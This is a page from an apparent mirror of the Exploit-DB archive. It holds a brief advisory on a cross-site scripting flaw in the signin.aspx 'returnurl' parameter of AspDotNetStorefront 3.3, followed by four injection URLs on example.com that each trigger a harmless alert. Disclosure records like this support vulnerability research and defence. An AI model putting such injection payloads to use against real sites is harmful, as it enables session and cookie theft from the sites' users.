bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/24185.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
1 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/10507/info
AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks.
AspDotNetStorefront 3.3 is reportedly affected by this issue, however, it is possible that other versions are affected as well.
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style=
"background:url(javascript:alert('Vulnerable_To_XSS'))"%20"
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=--><scri
pt>alert('Vulnerable_To_XSS')</script>
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"><scri
pt>alert("Vulnerable_To_XSS")</script>
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img
%20src="javascript:alert('Vulnerable_To_XSS')">
Reference in a new issue View git blame Copy permalink